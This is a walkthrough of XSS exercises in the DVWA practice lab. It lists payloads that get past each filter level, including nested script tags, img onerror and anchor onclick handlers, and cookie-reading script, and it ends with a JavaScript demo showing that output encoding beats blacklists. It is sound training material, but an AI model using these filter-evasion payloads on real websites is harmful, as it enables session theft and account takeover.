DVWA practice (XSS)

XSS (Reflected) - Low

Reviewing the source: the name parameter is not filtered or checked in any way.

Enter a piece of JavaScript: <script>alert('xss')</script>. A pop-up appears, so the injection succeeds.


Retrieve the cookie: <script>alert(document.cookie)</script>


XSS (Reflected) - Medium

Reviewing the source: there is a simple filter for script that replaces the string <script> with nothing, and it runs only once (a single pass, not repeated).


Bypass it by doubling the tag: enter <scr<script>ipt>alert('xss')</script>


XSS (Reflected) - High

Reviewing the source: a regular expression filter is used, so neither case variation nor tag doubling bypasses it.


Switch to a different tag: enter <img src="" onerror="alert('xss')">, and the injection succeeds.


XSS (Stored) - Low

Enter <script>alert('xss')</script>; a pop-up appears.


Enter <a href='' onclick=alert('xss')>click</a>, which creates a link that opens the pop-up when clicked.


Enter <a href=http://www.bilibili.com>click</a>; clicking the link opens the bilibili site.


Enter <script>alert(document.cookie)</script>, which displays the page's cookie.


XSS (Stored) - Medium

Reviewing the source: the message parameter has its special characters escaped, which prevents XSS there.


The escaped output (screenshot):


The name parameter has only a simple filter for <script> that replaces the first <script>, and the input is limited to 10 characters.


Capture the request and apply a simple bypass.


URL-encode it.


It executes successfully.


Retrieve the cookie.
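The three levels above use three different kinds of filter: a single-pass removal of <script> (Reflected Medium and the stored name field), a regex blacklist on the letters of "script" (Reflected High), and HTML entity encoding of the output (the stored message field). The following added example, which is not DVWA's code, models each filter in JavaScript and runs the writeup's own payloads through them so the difference is visible in one table. The function names, the stillActive heuristic and the acceptName helper are my own assumptions for illustration; the regex is the pattern DVWA's high level uses, and the 10-character limit is the client-side maxlength the bypass above gets around by resending the request, so the example repeats that rule on the server side.

```javascript
// Added example, not DVWA's own code: compares single-pass replace, a regex
// blacklist and HTML entity encoding against the payloads from the writeup.

// The four payloads shown in the writeup, reused here as test input.
const PAYLOADS = {
  plainScript: "<script>alert('xss')</script>",
  nestedScript: "<scr<script>ipt>alert('xss')</script>",
  imgOnerror: '<img src="" onerror="alert(\'xss\')">',
  anchorOnclick: "<a href='' onclick=alert('xss')>click</a>",
};

// Reflected/Medium style: remove the first literal "<script>" only.
// String.prototype.replace with a string pattern replaces one occurrence.
function replaceOnceFilter(input) {
  return input.replace("<script>", "");
}

// Reflected/High style: case-insensitive regex that strips anything spelling
// s-c-r-i-p-t after a "<" (the pattern DVWA's high level uses).
function regexBlacklistFilter(input) {
  return input.replace(/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i, "");
}

// Output encoding, the defence DVWA applies to the stored "message" field:
// turn the HTML metacharacters into entities so the browser renders them as
// text rather than markup.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" };
function htmlEncode(input) {
  return input.replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

// Heuristic used only for this demonstration (an assumption, not a real
// parser): does the filtered output still contain an opening <script> tag
// or any tag carrying an on* event handler attribute?
function stillActive(output) {
  return /<script\b/i.test(output) || /<\w+[^>]*\bon\w+\s*=/i.test(output);
}

// Run every filter over every payload. Returns { filterName: { payloadName: bool } }
// where true means the payload survived the filter as executable markup.
function evaluate() {
  const filters = { replaceOnceFilter, regexBlacklistFilter, htmlEncode };
  const result = {};
  for (const [fname, fn] of Object.entries(filters)) {
    result[fname] = {};
    for (const [pname, payload] of Object.entries(PAYLOADS)) {
      result[fname][pname] = stillActive(fn(payload));
    }
  }
  return result;
}

// The name field's 10-character limit lives in the form as a client-side
// maxlength, which is why resending the captured request gets past it. A
// server-side check has to repeat the rule; this helper (my assumption, not
// DVWA code) rejects over-long names and encodes the rest before storage.
const NAME_MAX = 10;
function acceptName(rawName) {
  if (typeof rawName !== "string" || rawName.length > NAME_MAX) return null;
  return htmlEncode(rawName);
}

console.log(JSON.stringify(evaluate(), null, 2));
```

Running it shows the pattern the writeup found by hand: the single-pass replace stops only the plain <script> payload, the regex stops both script payloads but neither the img nor the a tag (neither contains the letter p), and entity encoding leaves none of the four executable because no "<" survives. Blacklists enumerate what the attacker typed last time; encoding for the output context does not need to.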


XSS (Stored) - High

Reviewing the source: on top of the Medium level, script is now filtered strictly.


Simply avoid the word script: enter <a href='' onclick=alert('xss')>click</a>


The injection succeeds.
